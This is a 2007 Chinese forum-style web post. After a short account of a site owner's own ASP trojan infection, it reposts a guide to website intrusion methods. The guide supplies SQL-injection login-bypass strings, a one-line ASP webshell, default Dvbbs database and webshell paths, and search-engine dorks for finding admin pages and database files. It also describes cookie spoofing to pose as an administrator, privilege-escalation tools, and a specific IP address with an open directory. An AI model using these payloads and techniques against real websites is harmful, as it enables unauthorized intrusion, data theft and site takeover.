web入侵

是搞網站的都應該瞭解-淺談網站入侵的常用方法和一般思路
[日期：2007-02-15] 來源：站長公社  作者：網絡 [字體：大 中 小] 

上次發現網站文件夾的好幾個目錄下出現了不明的asp文件，才發現中了asp木馬。通過日誌分析，發現黑客是通過論壇程序的漏洞上傳的木馬文件。後研究了很多有關的資料，通過限制文件夾的寫入權限以及禁用了論壇的上傳功能來暫時獲得了相對的安全。希望大家引以爲戒，不要在問題出現後纔開始關注安全問題。

其實，如果服務器上安裝了一個好的防病毒軟件，這樣的木馬程序是無法藏身的，比如使用江民的病毒防火牆，就能基本杜絕國產木馬文件的存活，問題是：一個高流量的服務器，安裝像江民這樣的病毒防火牆，性能會有多大的影響呢？目前沒有任何關於病毒防火牆的資源消耗方面的測試。

無論如何，從安全配置的角度來提早做好防衛，是最爲關鍵的。這不僅僅涉及到服務器的配置，還涉及到WEB程序的代碼安全問題，比如SQL的注入攻擊。即便你的操作系統的配置絕對安全，仍然無法抵禦一個小小的SQL注入漏洞的侵略---這裏面涉及的安全問題太多了。

 下面是轉貼的文章，請各位認真瞭解一下：

淺談網站入侵的常用方法和一般思路

首先介紹下什麼樣站點可以入侵 我認爲必須是動態的網站 如ASP PHP JSP等代碼編寫的站點
如果是靜態的（.htm或html）,一般是不會成功的

 

14種可利用的入侵方法

1.上傳漏洞
如果看到:選擇你要上傳的文件 [重新上傳]或者出現“請登陸後使用”，80%就有漏洞了！
有時上傳不一定會成功,這是因爲Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.　

2.注入漏洞
字符過濾不嚴造成的

 

3.旁註,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊，我們可以找下和這個站同一服務器的站點，然後在利用這個站點用提權，嗅探等方法來入侵我們 要入侵的站點。

4.暴庫:把二級目錄中間的/換成%5c　
　
　

5.’or’=’or’這是一個可以連接SQL的語名句.可以直接進入後臺。我收集了一下。類似的還有：
　’or’’=’　" or "a"="a　　 ’) or (’a’=’a　　 ") or ("a"="a　　or 1=1--　 ’ or ’a’=’a

6.社會工程學。這個我們都知道吧。就是猜解。
　

７.寫入ASP格式數據庫。就是一句話木馬〈%execute request("value")%〉 （數據庫必需得是ASP或ASA的後綴）
　　

8.源碼利用：一些網站用的都是網上下載的源碼.有的站長很懶.什麼也不改.
　　　

9.默認數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具：網站獵手　挖掘雞 明小子

10.查看目錄法:人一些網站可以斷開目錄，可以方問目錄。
210.37.95.65 images

11.工具溢出
　　　　　　
12.搜索引擎利用:
　
(1).inurl:flasher_list.asp　 默認數據庫:database/flash.mdb　 後臺/manager/
(2).找網站的管理後臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理　 〈關鍵字很多，自已找〉
site:xxxx.cominurl:login
(3).查找access的數據庫,mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb

13.COOKIE詐騙：把自己的ID修改成管理員的，MD5密碼也修改成他的，用桂林老兵工具可以修改COOKIE。

14.利用常見的漏洞：如動網BBS
可以先用:dvbbs權限提升工具，使自已成爲前臺管理員。
THEN，運用:動網固頂貼工具，找個固頂貼，再取得COOKIES，這個要你自已做。我們可以用WSockExpert取得Cookies/NC包
這個我就不做了，網上教程多的是，自已下個看看。
工具：dvbbs權限提升工具　 動網固頂貼工具

15.還有一些老漏洞。如IIS3，4的查看源碼，5的DELETE
　 CGI，PHP的一些老洞，我就不說了啊。。太老了。沒有什麼大用途。　

#######################################
　　　　　　　

　　　　　　　　　一般入侵思路　　　　

　　　　　　　腳本注入（ASP PHP JSP）
1.腳本漏洞　　　
　　　　　　　其它腳本漏洞（上傳漏洞，跨站漏洞）　

　　　　　　　　
　　　　　　　　　
　　　　　　域名旁註　　　
2.旁註　　　　　
　　　　　 “IP”旁註

 

　　　　　　本地溢出
3.溢出漏洞　
　　　　　　遠程溢出

 

　　　　　　ARP欺騙
4.網絡竊聽
　　　　　　IP欺騙

5.社會工程學